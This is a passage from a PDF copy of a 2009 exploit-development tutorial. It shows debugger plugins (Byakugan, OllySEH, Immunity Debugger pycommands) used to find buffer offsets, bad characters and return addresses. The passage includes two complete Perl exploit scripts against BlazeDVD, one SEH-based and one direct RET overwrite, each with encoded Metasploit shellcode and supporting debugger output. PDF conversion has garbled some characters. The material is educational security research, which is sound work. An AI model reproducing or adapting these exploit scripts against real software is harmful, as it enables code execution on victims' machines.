50 49 4c 4b 46 54 4c 4b 45 51 4a 4e 50 31 49 50 50 49 4c 4b 46 54 4c 4b 45 51 4a 4e 50 31 49 50
4c 59 4e 4c 4c 44 49 50 44 34 45 57 49 51 49 5a 4c 59 4e 4c 4c 44 49 50 44 34 45 57 49 51 49 5a
44 4d 44 31 49 52 4a 4b 4b 44 47 4b 50 54 47 54 44 4d 43 31 49 52 4a 4b 4b 44 47 4b 50 54 47 54
45 54 44 45 4a 45 4c 4b 51 4f 46 44 45 51 4a 4b 45 54 43 45 4a 45 4c 4b 51 4f 46 44 45 51 4a 4b
45 36 4c 4b 44 4c 50 4b 4c 4b 51 4f 45 4c 44 31 45 36 4c 4b 44 4c 50 4b 4c 4b 51 4f 45 4c 43 31
4a 4b 4c 4b 45 4c 4c 4b 44 31 4a 4b 4d 59 51 4c 4a 4b 4c 4b 45 4c 4c 4b 43 31 4a 4b 4d 59 51 4c
46 44 44 34 49 53 51 4f 46 51 4b 46 44 50 46 36 46 44 43 34 49 53 51 4f 46 51 4b 46 43 50 46 36
45 34 4c 4b 50 46 50 30 4c 4b 51 50 44 4c 4c 4b 45 34 4c 4b 50 46 50 30 4c 4b 51 50 44 4c 4c 4b
42 50 45 4c 4e 4d 4c 4b 42 48 44 38 4b 39 4a 58 42 50 45 4c 4e 4d 4c 4b 42 48 43 38 4b 39 4a 58
4d 53 49 50 44 5a 50 50 44 58 4c 30 4d 5a 45 54 4d 53 49 50 43 5a 50 50 43 58 4c 30 4d 5a 45 54
51 4f 42 48 4d 48 4b 4e 4d 5a 44 4e 50 57 4b 4f 51 4f 42 48 4d 48 4b 4e 4d 5a 44 4e 50 57 4b 4f
4b 57 44 53 44 51 42 4c 44 53 44 30 41 41 4b 57 43 53 43 51 42 4c 43 53 43 30 41 41
[J] Bytes replaced: 0x89 0xe3 0xdb 0xc2 0xd9 0xf4 0x43
[J] Offset corruption occurs at:
Now we see 24 bytes in bold (which corresponds with the 24 bytes that were change in the exploit
script). This is a good way to determine whether shellcode (or ascii patterns or metasploit patterns)
were changed in memory. You can also see the “Bytes replaced”. Compare the line of bytes with
the line that was printed out in the first test. We now see 0x43 added to the list (which is exactly
the byte that was changed in my shellcode)… Way to go byakugan ! High five again !
memDiff can really save you lots of time when you need to compare shellcode and find bad
characters…
Note : memDiff types are parameters :
0:000> !jutsu memDiff
[J] Format: memDiff <type> <size> <value> <address>
Valid Types:
hex: Value is any hex characters
file: Buffer is read in from file at path <value>
buf: Buffer is taken from known tracked Buffers
Byakugan : identBuf/listBuf/rmBuf and hunt
These 3 jutsu functions will help you finding buffer locations in memory.
Let’s assume the following script :
my $sploitfile="blazesploit.plf";
my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab…";
my $nseh = "xccxccx90x90"; #jump 30 bytes
my $seh = pack('V',0x640246f7); #pop esi, pop ebx, ret
my $nop = "x90" x 30; #start with 30 nop's
# windows/exec - 302 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 7 / 20
8. http://www.corelan.be:8800 - Page 8 / 20
my $shellcode="x89xe3xdbxc2xd9x73xf4x59x49x49x49x49x49x43" .
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58" .
"x34x41x50x30x41x33x48x48x30x41x30x30x41x42" .
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30" .
"x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4bx58" .
"x51x54x43x30x45x50x45x50x4cx4bx47x35x47x4c" .
"x4cx4bx43x4cx43x35x44x38x43x31x4ax4fx4cx4b" .
"x50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b" .
"x50x49x4cx4bx46x54x4cx4bx45x51x4ax4ex50x31" .
"x49x50x4cx59x4ex4cx4cx44x49x50x44x34x45x57" .
"x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4bx44" .
"x47x4bx50x54x47x54x45x54x43x45x4ax45x4cx4b" .
"x51x4fx46x44x45x51x4ax4bx45x36x4cx4bx44x4c" .
"x50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4cx4b" .
"x45x4cx4cx4bx43x31x4ax4bx4dx59x51x4cx46x44" .
"x43x34x49x53x51x4fx46x51x4bx46x43x50x46x36" .
"x45x34x4cx4bx50x46x50x30x4cx4bx51x50x44x4c" .
"x4cx4bx42x50x45x4cx4ex4dx4cx4bx42x48x43x38" .
"x4bx39x4ax58x4dx53x49x50x43x5ax50x50x43x58" .
"x4cx30x4dx5ax45x54x51x4fx42x48x4dx48x4bx4e" .
"x4dx5ax44x4ex50x57x4bx4fx4bx57x43x53x43x51" .
"x42x4cx43x53x43x30x41x41";
$payload =$junk.$nseh.$seh.$nop.$shellcode;
open ($FILE,">$sploitfile");
print $FILE $payload;
close($FILE);
open ($FILE2,">c:shell.txt");
print $FILE2 $nop.$shellcode;
close($FILE2);
Note : “my $junk” contains a metasploit pattern of 608 characters. (so you’ll have to
create it yourself and paste it in the script - it was too long to put it on this page).
nseh contains breakpoints. And finally, at the bottom of the script, the nops +
shellcode are written to a file (c:shell.txt).
Open windbg, launch blazeDVD, open the sploit file (which should make the application die). First
change exception :
(d54.970): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=05a8dcd8 edx=00000042 esi=01f61c20 edi=6405569c
eip=37694136 esp=0012f470 ebp=01f61e60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
<Unloaded_ionInfo.dll>+0x37694135:
37694136 ?? ???
Now create 2 identBuf definitions : one for the metasploit pattern, and one for the shellcode :
0:000> !load byakugan
[Byakugan] Successfully loaded!
0:000> !jutsu identBuf file myShell c:shell.txt
[J] Creating buffer myShell.
0:000> !jutsu identBuf msfpattern myBuffer 608
[J] Creating buffer myBuffer.
0:000> !jutsu listBuf
[J] Currently tracked buffer patterns:
Buf: myShell Pattern: ãÛÂÙsôYIIIIICCCCCCQZVT...
Buf: myBuffer Pattern: Aa0Aa1A...
Let byakugan hunt for these buffers :
0:000> !jutsu hunt
[J] Controlling eip with myBuffer at offset 260.
[J] Found buffer myShell @ 0x0012f5c0
[J] Found buffer myShell @ 0x0012f5c0 - Victim of toUpper!
[J] Found buffer myShell @ 0x0012f5c0 - Victim of toLower!
[J] Found buffer myBuffer @ 0x01f561e4
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 8 / 20
9. http://www.corelan.be:8800 - Page 9 / 20
As seen earlier in this post, we could overwrite EIP directly (but we have chosen to go for a SEH
based exploit). Hunt tells us that we control eip at offset 260. So hunt will give us the same results
as !pattern_offset. On top of that, hunt will look for our pre-identified buffers and give us the
addresses. I have asked Lurene Grenier if he could display the offset to a register if this output
(which would make it even easier to find your buffers… he told me that he will think of building a
generic solution for this - to be continued…)
Press “g” in windbg (to pass the first chance exception to the application). The application now
breaks at our breakpoints (which where placed at nseh)
0:000> g
(d54.970): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=0012f188 ecx=640246f7 edx=7c9032bc esi=7c9032a8 edi=00000000
eip=0012f5b8 esp=0012f0ac ebp=0012f0c0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
<Unloaded_ionInfo.dll>+0x12f5b7:
0012f5b8 cc int 3
Run ‘hunt’ again :
0:000> !jutsu hunt
[J] Found buffer myShell @ 0x0012f5c0
[J] Found buffer myShell @ 0x0012f5c0 - Victim of toUpper!
[J] Found buffer myShell @ 0x0012f5c0 - Victim of toLower!
[J] Found buffer myBuffer @ 0x01f561e4
We no longer control eip directly via myBuffer (because we have passed on the first exception to
the application), but if we look at eip (0x0012f5b8) , we can see it points to a location that is very
close to buffer myShell (0x0012f5c0) (so a short jump would make the application jump to the
shellcode.
0:000> d eip+8
0012f5c0 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0012f5d0 90 90 90 90 90 90 90 90-90 90 90 90 90 90 89 e3 ................
0012f5e0 db c2 d9 73 f4 59 49 49-49 49 49 43 43 43 43 43 ...s.YIIIIICCCCC
0012f5f0 43 51 5a 56 54 58 33 30-56 58 34 41 50 30 41 33 CQZVTX30VX4AP0A3
0012f600 48 48 30 41 30 30 41 42-41 41 42 54 41 41 51 32 HH0A00ABAABTAAQ2
0012f610 41 42 32 42 42 30 42 42-58 50 38 41 43 4a 4a 49 AB2BB0BBXP8ACJJI
0012f620 4b 4c 4b 58 51 54 43 30-45 50 45 50 4c 4b 47 35 KLKXQTC0EPEPLKG5
0012f630 47 4c 4c 4b 43 4c 43 35-44 38 43 31 4a 4f 4c 4b GLLKCLC5D8C1JOLK
This proves that, since our breakpoint is placed at the first byte of where nseh is overwritten, a
jump of 8 bytes (- 2 bytes of code to make the jump itself) will make the app flow jump to our
shellcode.
Byakugan : findReturn
We have seen that we can also build an exploit based on direct RET overwrite (at offset 260).
Let’s build a script that will demonstrate the use of findReturn help us building a working exploit :
First, write a script that will build a payload made up of 264 metasploit pattern characters, followed
by 1000 A’s :
my $sploitfile="blazesploit.plf";
my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8 . . . Ai7";
my $junk2 = "A" x 1000;
$payload =$junk.$junk2;
open ($FILE,">$sploitfile");a
print $FILE $payload;
close($FILE);
open ($FILE2,">c:junk2.txt");
print $FILE2 $junk2;
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 9 / 20
10. http://www.corelan.be:8800 - Page 10 / 20
close($FILE2);
When opening the sploitfile, windbg reports this :
(c34.7f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=05a8dcd8 edx=00000042 esi=01f61c20 edi=6405569c
eip=37694136 esp=0012f470 ebp=01f61e60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
<Unloaded_ionInfo.dll>+0x37694135:
37694136 ?? ???
Let’s use the byakugan arsenal to find all required information to build a working exploit :
q track the metasploit pattern ($junk)
q track the A’s ($junk2)
q see where eip is overwritten (offset)
q see where $junk and $junk2 are
q find return addresses
0:000> !load byakugan
[Byakugan] Successfully loaded!
0:000> !jutsu identBuf msfpattern myJunk1 264
[J] Creating buffer myJunk1.
0:000> !jutsu identBuf file myJunk2 c:junk2.txt
[J] Creating buffer myJunk2.
0:000> !jutsu listBuf
[J] Currently tracked buffer patterns:
Buf: myJunk1 Pattern: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0A... (etc)
Buf: myJunk2 Pattern: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (etc)
0:000> !jutsu hunt
[J] Controlling eip with myJunk1 at offset 260.
[J] Found buffer myJunk1 @ 0x0012f254
[J] Found buffer myJunk2 @ 0x0012f460
[J] Found buffer myJunk2 @ 0x0012f460 - Victim of toUpper!
0:000> !jutsu findReturn
[J] started return address hunt
[J] valid return address (jmp esp) found at 0x3d9572cc
[J] valid return address (call esp) found at 0x3d9bb043
[J] valid return address (jmp esp) found at 0x3d9bd376
[J] valid return address (call esp) found at 0x4b2972cb
[J] valid return address (jmp esp) found at 0x4b297591
[J] valid return address (call esp) found at 0x4b297ccb
[J] valid return address (jmp esp) found at 0x4b297f91
[J] valid return address (call esp) found at 0x4ec5c26d
[J] valid return address (jmp esp) found at 0x4ec88543
[J] valid return address (call esp) found at 0x4ece5a73
[J] valid return address (jmp esp) found at 0x4ece7267
[J] valid return address (call esp) found at 0x4ece728f
[J] valid return address (jmp esp) found at 0x4f1c5055
[J] valid return address (call esp) found at 0x4f1c50eb
[J] valid return address (jmp esp) found at 0x4f1c53b1
[J] valid return address (call esp) found at 0x4f1c5aeb
[J] valid return address (jmp esp) found at 0x4f1c5db1
[J] valid return address (jmp esp) found at 0x74751873
[J] valid return address (call esp) found at 0x7475d20f
[J] valid return address (jmp esp) found at 0x748493ab
[J] valid return address (call esp) found at 0x748820df
[J] valid return address (jmp esp) found at 0x748d5223
[J] valid return address (call esp) found at 0x755042a9
[J] valid return address (jmp esp) found at 0x75fb5700
[J] valid return address (jmp esp) found at 0x76b43adc
[J] valid return address (call esp) found at 0x77132372
[J] valid return address (jmp esp) found at 0x77156342
[J] valid return address (call esp) found at 0x77506cca
[J] valid return address (jmp esp) found at 0x77559bff
[J] valid return address (call esp) found at 0x7756e37b
[J] valid return address (jmp esp) found at 0x775a996b
[J] valid return address (jmp esp) found at 0x77963da3
[J] valid return address (call esp) found at 0x7798a67b
[J] valid return address (call esp) found at 0x77b4b543
[J] valid return address (jmp esp) found at 0x77def069
[J] valid return address (call esp) found at 0x77def0d2
[J] valid return address (jmp esp) found at 0x77e1b52b
[J] valid return address (call esp) found at 0x77eb9d02
[J] valid return address (jmp esp) found at 0x77f31d8a
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 10 / 20
11. http://www.corelan.be:8800 - Page 11 / 20
[J] valid return address (call esp) found at 0x77f396f7
[J] valid return address (jmp esp) found at 0x77fab227
etc...
Results :
q eip was overwritten at offset 260 from myJunk1.
q myJunk2 (A’s) was found at 0x0012f460 (which is esp-10). So if we replaced eip with jmp esp, we
can let our shellcode begin at myJunk2 + 10 bytes (or 16 characters)
q we need to remove the last 4 bytes from $junk in our script, and add the address (4 bytes) of jmp esp
or call esp, which will overwrite RET. (Of course, you still need to verify the address…). We’ll use
0x035fb847 as an example (not shown in the output above, I still prefer to manually select the return
addresses using memdump or findjmp - just because you cannot see the module they belong to in the
output of ‘findReturn’…
q we need to
rreplace the 1000 A’s with shellcode
radd at least 16 NOP’s before the shellcode (I have added 50 nops … If you add less, you may see
shellcode corruption, which I easily detected using memDiff)
Script :
my $sploitfile="blazesploit.plf";
my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6A...Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai"; #260 characters
#$junk is now 4 byte shorter
my $ret = pack('V',0x035fb847); #jmp esp from EqualizerProcess.dll
my $nop="x90" x 50;
# windows/exec - 302 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
my $shellcode="x89xe3xdbxc2xd9x73xf4x59x49x49x49x49x49x43" .
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58" .
"x34x41x50x30x41x33x48x48x30x41x30x30x41x42" .
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30" .
"x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4bx58" .
"x51x54x43x30x45x50x45x50x4cx4bx47x35x47x4c" .
"x4cx4bx43x4cx43x35x44x38x43x31x4ax4fx4cx4b" .
"x50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b" .
"x50x49x4cx4bx46x54x4cx4bx45x51x4ax4ex50x31" .
"x49x50x4cx59x4ex4cx4cx44x49x50x44x34x45x57" .
"x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4bx44" .
"x47x4bx50x54x47x54x45x54x43x45x4ax45x4cx4b" .
"x51x4fx46x44x45x51x4ax4bx45x36x4cx4bx44x4c" .
"x50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4cx4b" .
"x45x4cx4cx4bx43x31x4ax4bx4dx59x51x4cx46x44" .
"x43x34x49x53x51x4fx46x51x4bx46x43x50x46x36" .
"x45x34x4cx4bx50x46x50x30x4cx4bx51x50x44x4c" .
"x4cx4bx42x50x45x4cx4ex4dx4cx4bx42x48x43x38" .
"x4bx39x4ax58x4dx53x49x50x43x5ax50x50x43x58" .
"x4cx30x4dx5ax45x54x51x4fx42x48x4dx48x4bx4e" .
"x4dx5ax44x4ex50x57x4bx4fx4bx57x43x53x43x51" .
"x42x4cx43x53x43x30x41x41";
$payload =$junk.$ret.$nop.$shellcode;
open ($FILE,">$sploitfile");
print $FILE $payload;
close($FILE);
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 11 / 20
12. http://www.corelan.be:8800 - Page 12 / 20
Ollydbg plugins
openrce.com has a large number of ollydbg plugins. I’m not going to discuss all of them, but the
most important/usefull Ollydbg plugin when writing exploits is OllySEH
This plugin does an in-memory scanning of process loaded modules checking if they were
compiled with /safeseh. This means that you can only use this plugin when ollydbg is attached to
the process. The plugin will help you finding the correct memory space to look for
reliable/working return addresses by listing the modules that are compiled (and the ones that are
not compiled - which is even more important) with /safeseh.
Suppose you have found a SEH based vulnerability in BlazeDVD5, and you need to find a reliable
“pop pop ret”, you can use ollyseh to find all modules that are not compiled with /safeseh, and then
look for pop pop ret instructions in that memory space :
List executable modules : (E)
List safeseh modules :
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 12 / 20
13. http://www.corelan.be:8800 - Page 13 / 20
Look for anything that has “No SEH” or (even better) “/SafeSEH OFF” to find memory space that
can be queried for a pop pop ret instruction.
Let’s try c:program filesBlazevideoBlazeDVD 5 ProfessionalMediaPlayerCtrl.dll
You could use findjmp to find pop pop ret instructions, or you could do it the hard way by
searching for the instructions in the dll using ollydbg :
Go back to the list of executable modules, find the dll and double-click it
Right-click and choose “Search for” - “Sequence of commands”.
Let’s say you want to look for pop eax, pop <something>, ret, you could do a search for :
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 13 / 20
14. http://www.corelan.be:8800 - Page 14 / 20
(try all combinations with various registers until you find something). Of course, findjmp.exe will
work a lot faster because you would only need to vary the first register in the pop pop ret sequence
(and the register of the second pop would be located by findjmp automatically). It would indicate a
lot faster that this dll does not have any usefull pop pop ret combinations and that you would need
to look for another dll to use.
EIther way, this plugin can save you a lot of time when writing SEH based exploits, as you will be
able to find a reliable pop pop ret address faster than just by picking any dll and finding addresses
using elimination.
Immunity Debugger (ImmDbg) plugins/pycommands
Immunity debugger comes with a nice / large set of plugins, you can find some more useful
plugins/pycommands at the following locations :
q findtrampoline : http://www.openrce.org/forums/posts/559
q aslrdynamicbase : http://www.openrce.org/forums/posts/560
q funcdump
q nsearch : http://natemcfeters.blogspot.com/2009/02/nsearch-new-immunitydbg-searching.html
q pvefindaddr (my own custom pycommand)
Because of immdbg’s integration with python, and well documented API, you can add/write your
own commands/plugins.
Download the .py files and put them in the pycommand folder.
The nice thing about ImmDbg is that it contains aliases for the windbg commands, so
you can take advantage of the scripting power of immdbg, and still use the windbg
command set (if you are more familiar with the windbg commands)
Findtrampoline
This script offers similar functionality as findjmp or Metasploit’s msfpescan tools, when used to
find suitable return addresses when exploiting a classic stack overflow. It allows you to look for
jmp <reg>, call <reg> and push <reg> + ret combinations. (It does not offer functionality to look
for pop pop ret combinations though, which is possible with findjmp and msfpescan)
You can invoke the findtrampoline script by opening the PyCommand window and selecting the
findtrampoline script to run :
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 14 / 20
15. http://www.corelan.be:8800 - Page 15 / 20
Double-click, enter the register you want to look for as an argument, and click “OK” to start the
script :
Now wait for the search to complete. The search will look in all loaded modules for a jmp esp (in
our example) and then display the number of trampolines/addresses found :
Alternatively, you can just run the !findtrampoline <reg> command at the bottom of the screen
(command line) to kick of the script.
Both will trigger 3 search operations to be conducted (jmp, call, and push+ret)
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 15 / 20
16. http://www.corelan.be:8800 - Page 16 / 20
To see the results, open the “Log data” window :
In order to see what instruction was found, select the address and double-click. Then open the
“CPU” window
Alternatively, you could use the !searchcode command to look for f.i. jmp esp instruction :
(The output will indicate the address, module (dll) and whether the instruction is in an executable
page or not.) Of course, the searchopcode command also works fine, but !findtrampoline will
look for all working combinations (whereas searchopcode requires a specific instruction to look for)
aslrdynamicbase
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 16 / 20
17. http://www.corelan.be:8800 - Page 17 / 20
This command will list all modules and indicate whether they are enabled for address space layout
randomization or not (vista and 2008). This will allow you to build reliable exploits for these
OS’es by looking for return addresses that will have the same address even after a reboot (basically
by selecting the application executable or non-aslr enabled dll memory space when looking for
these addresses)
This command does not require any arguments. Just run the command from a command line, and
look at the ASLR /dynamicbase table for memory locations that are not ASLR enabled/aware.
This one does not only save you time, it will simply mean the difference between being able to
build a reliably working exploit and a one-shot working exploit (one that stops working after a
reboot).
pvefindaddr
This is a small plugin I wrote myself. For more information about this plugin, login and visit the
forum at
http://www.corelan.be:8800/index.php/forum/writing-exploits/pvefindaddr-pycommand-plugin-for
-immdbg/
I will shortly discuss the following 4 operations (but the current version has many more functions)
:
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 17 / 20
18. http://www.corelan.be:8800 - Page 18 / 20
q p : look for pop/pop/ret combinations (useful when building SEH based exploits) It will automatically
filter out the modules that are safeseh protected. So the addresses you get will be not safeseh
protected. Furthermore, it will automatically try all combinations and look in all loaded modules (so
you don’t have to specify a register or module. If you specify a register, then it will only show
combinations where the register is used. If you specify a register and a module name, then you will
obviously get all combinations where this register is used, and only from the specified module (even if
that module is safeseh protected !)
q j : look for all jmp/call/push ret combinations (useful when building direct ret overwrite exploits). You
have to specify the register to jump to, and optionally specify a module name
q jseh : this operation is useful when bypassing safeseh protections. (see tutorial series part 6). Again,
this operation will search for all combinations automatically
q nosafeseh : show all currently loaded modules that are not safeseh protected
Download :
[download id=31]
Other pycommands & command syntax
In order to get more info on how to use the pycommands, simply run the pycommand from the
command line without arguments, open the log data windows and you’ll get a short help text
indicating the parameters that need to be provided in order to correctly run the script.
Other commands will simply open a nice wizard when they are launched without parameters (such
as the !antidep command), and others will just throw an exception :-(
More information about immdbg and pycommands can be found here and here
(ImmDbg has a lot of cool scripts to help with heap based exploit development, which is out of
scope for this article right now)
Happy hunting !
Some other cool stuff in immdbg
!packets
Allows you to capture packets from the wire and get the function that was responsible for
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 18 / 20
19. http://www.corelan.be:8800 - Page 19 / 20
sending/receiving the packets. Example : Open firefox and attach immdbg to the process. Before
kicking firefox out of the debugger-enforced breakpoint, launch !packets
Continue to run firefow and navigate to a website. Now go back to immdbg and observe the
“Captured Packets” window :
!safeseh
This command will list the executable modules and indicate whether they are safeseh protected or
not. After running the !safeseh command, you need to open the “Log Data” window to see the
results.
This entry was posted on Saturday, September 5th, 2009 at 11:35 am and is filed under Exploits,
Security You can follow any responses to this entry through the Comments (RSS) feed. You can
leave a response, or trackback from your own site.
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 19 / 20
20. http://www.corelan.be:8800 - Page 20 / 20
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 20 / 20